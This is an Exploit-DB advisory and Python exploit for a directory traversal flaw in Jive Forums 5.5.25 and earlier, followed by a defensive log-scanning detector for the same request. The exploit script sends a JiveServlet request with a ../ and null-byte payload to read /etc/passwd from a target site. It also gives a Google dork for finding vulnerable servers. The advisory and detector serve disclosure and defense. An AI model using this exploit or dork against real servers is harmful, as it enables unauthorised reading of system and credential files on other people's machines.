Jive Forums 5.5.25 - Directory Traversal

EDB-ID: 39405
Author: ZhaoHuAn
Type: webapps
Platform: JSP
Date: 2016-02-03


'''
JiveForums <=5.5.25 Directory Traversal Vulnerability

Description
==========
Jive Forums is a widely recognized online community product. Its products have been used by global IT giants including IBM, HP, Oracle, Adobe, Cisco, Intel, Amazon, EMC, McAfee, Rapid7, FireEye, etc.
JiveForums versions <= 5.5.25 and < 4.0 are vulnerable to a directory traversal security issue; other versions may also be affected.

Details
=======
Product: JiveSoftware
Security-Risk: high
Remote-Exploit: yes
Vendor-URL: https://www.jivesoftware.com

Credits
============
Discovered by: Zhaohuan of Tencent Security
Site: http://security.tencent.com

Affected Products:
=================
Tested on JiveForums 5.5.25/5.5.20/5.5.7/3.2.10/2.6.2
May work on versions <= 5.5.25

Exploit:
============
'''

#!/usr/bin/python
# Author: Zhaohuan || http://weibo.com/hackyou
# Google Dork: inurl:servlet/JiveServlet
# Tested on JiveForums 5.5.25/5.5.20/5.5.7/3.2.10/2.6.2
#
# Software Link: https://www.jivesoftware.com

import urllib2
import sys

print "JiveForums <=5.5.25 Directory Traversal Exploit"

if len(sys.argv) != 3:
    print "[-] Trying exploit on : <site> <path>"
    print "[*] Usage: %s http://localhost /jiveforums/" % sys.argv[0]
    sys.exit()

payload = 'servlet/JiveServlet?attachImage=true&attachment=/.././.././.././.././.././.././.././../etc/./passwd%00&contentType=image%2Fpjpeg'
print "[+] Trying to request :"+sys.argv[1]+sys.argv[2]+payload
response=urllib2.urlopen(sys.argv[1]+sys.argv[2]+payload)
readvul=response.read()
print readvul


'''
Solution:
============
Update to JiveForums 5.5.30 or the latest version.

More Information:
https://www.jivesoftware.com/services-support/
'''
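
A detection-side view of the request shown above, added here as an example and not part of the original advisory or exploit: it scans web access logs for `servlet/JiveServlet` requests whose `attachment` parameter contains dot-dot path segments or a null byte after percent-decoding. The log lines are constructed, and the combined log format and the benign `attachment=1234` value are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (not real traffic); the first mirrors the request above.
SAMPLE_LOG = [
    '203.0.113.7 - - [03/Feb/2016:10:00:01 +0000] "GET /jiveforums/servlet/JiveServlet'
    '?attachImage=true&attachment=/.././.././../etc/./passwd%00&contentType=image%2Fpjpeg'
    ' HTTP/1.1" 200 1843',
    '198.51.100.4 - - [03/Feb/2016:10:00:05 +0000] "GET /jiveforums/servlet/JiveServlet'
    '?attachImage=true&attachment=1234&contentType=image%2Fpjpeg HTTP/1.1" 200 52311',
    '198.51.100.4 - - [03/Feb/2016:10:00:09 +0000] "GET /jiveforums/index.jsp HTTP/1.1" 200 9120',
]
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')

def normalize(value, rounds=3):
    """Percent-decode repeatedly so nested encodings are flattened before matching."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value.replace("\\", "/")  # treat both separator styles alike

def attachment_findings(value):
    """Return the reasons an 'attachment' value looks like path traversal."""
    v = normalize(value)
    reasons = []
    if "\x00" in v:
        reasons.append("null byte")
    if ".." in v.split("/"):
        reasons.append("dot-dot segment")
    return reasons

def scan(lines):
    """Return (client, reasons) for each suspicious JiveServlet attachment request."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        url = urlsplit(m.group(1)) if m else None
        if url is None or not url.path.endswith("/servlet/JiveServlet"):
            continue
        # parse_qs decodes once; attachment_findings decodes any remaining layers.
        for value in parse_qs(url.query).get("attachment", []):
            reasons = attachment_findings(value)
            if reasons:
                hits.append((line.split()[0], reasons))
    return hits
```

A match shows that a traversal attempt was logged, not that a file was returned; the response status and size on the same log line help triage, and the fix remains the upgrade named in the Solution.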